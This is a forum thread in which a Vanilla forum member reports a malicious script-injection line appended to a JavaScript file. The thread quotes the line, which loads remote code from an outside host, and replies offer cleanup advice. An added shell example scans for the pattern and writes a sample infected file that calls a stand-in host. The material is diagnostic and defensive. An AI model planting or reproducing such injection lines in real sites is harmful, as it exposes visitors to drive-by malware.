Odd javascript injected
Hey guys,
I am a member of a graphic community, which uses Vanilla as the software of their choice.
Today the loading speed really sucked. After some investigation I found an odd HTML request going to chefacasa.es in the background. Chefacasa does not have anything in common with the graphic community, which led me to the conclusion that this request is not supposed to happen.
I investigated the requests and saw that even a cookie communication takes place. Further research showed that this request happens in
/board/js/library/jquery.gardenmorepager.js?v=2.0.18.1
The following lines have been added to the end of the file:
/*92822e*/ document.write("<script src='http://mallorca.chefacasa.es/zYWprFvt.php?id=118610534' type='text/javascript'></" + "script>"); /*/92822e*/
This seems like corrupted code. Since the community is really small and kind of one of the more personal communities, I trust the administrators. I think they did NOT inject any bad code. However, I have already gotten in touch with them.
Does anyone here have any experience with what happens here?
Comments
@smoes your server is compromised; this is malware. You need to replace the framework files, and many files could be infected. Don't forget to do backups.
You can trust your admins, but on the other hand that doesn't mean that they practiced good home security.
That being said, forum admin would have access to your server, only the web framework.
There are two ways your files can get maliciously written to.
grep is your friend.
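An added example, not part of the original thread and not any poster's code: a shell scan for the injection shape quoted in the first post, a document.write() of a remote script sitting between two comments that share one hex tag. The generalisation to any 6-hex-digit tag, the function names and the sample files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): locate .js files carrying the kind of
# injection quoted in the first post.

# The quoted line wraps document.write() of a remote <script> between a pair of
# comments sharing one hex tag: /*92822e*/ ... /*/92822e*/.
# Assumption: other infected files use the same shape with any 6-hex-digit tag,
# so the tag is captured and the closing comment must repeat it (\1).
PATTERN='/\*\([0-9a-f]\{6\}\)\*/.*document\.write(.*<script[^>]*src=.*/\*/\1\*/'

# scan_injected_js DIR: print the path of every matching .js file under DIR.
# Always returns 0; an empty result means nothing matched.
scan_injected_js() {
    find "$1" -type f -name '*.js' -exec grep -l -e "$PATTERN" {} + || true
}

# make_sample_tree DIR: constructed test data, not files from the affected site.
make_sample_tree() {
    mkdir -p "$1/js/library"
    # Clean file: legitimate code only.
    printf '%s\n' 'function pager(n) { return n + 1; }' > "$1/js/clean.js"
    # Infected file: legitimate code with the injection appended at the end.
    {
        printf '%s\n' 'function pager(n) { return n + 1; }'
        printf '%s\n' "/*a1b2c3*/ document.write(\"<script src='http://host.example.invalid/x.php?id=1' type='text/javascript'></\" + \"script>\"); /*/a1b2c3*/"
    } > "$1/js/library/infected.js"
    # Near miss: the two tags do not pair up, so it must not be reported.
    printf '%s\n' '/*a1b2c3*/ document.write("<script src=local.js></" + "script>"); /*/ffffff*/' \
        > "$1/js/nearmiss.js"
}

# Stand-alone demo: build the constructed tree, scan it, clean up.
demo() {
    tmp=$(mktemp -d)
    make_sample_tree "$tmp"
    scan_injected_js "$tmp"
    rm -rf "$tmp"
}
demo
```

Point scan_injected_js at a copy of the web root; a hit means the file should be replaced from a clean release rather than edited in place.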
I feared that. It also seems that chefacasa.es has been corrupted. I do not think they know what is going on. I'll give them a hint. Thank you for your reply, I also will manage to get the forum updated.
I mirror @Shadowdare, however, like I said, this is not a substitute for good practice in server management and security practices.
It is possible that they have been a victim of an unknown exploit that someone found in Vanilla, but they are using 2.0.18.1, which was released back in 2011. There have been many updates with security patches since then. They should upgrade to 2.0.18.10 as soon as possible. @x00 posted some good advice just now that the administrators of the website should focus on as well.
Edit: double posted accidentally.
@x00: Thank you for your answer. Do you think it is safe to naively back up the database, erase the data on the server and install the current Vanilla? Or could some corrupted data have already been stored in the database? Additionally, everyone needs to change their passwords, for sure.
They need to follow the documentation on upgrading.
Hi,
My website was infected on 16 January by the same code.
I don't use Vanilla; I think that a user who uses FTP access is infected by malware. I think that is the most probable.
Only the .js archives were modified and I restored them.
Any suggestion?
Thanks,
Yes
Thanks for all.
Best regards.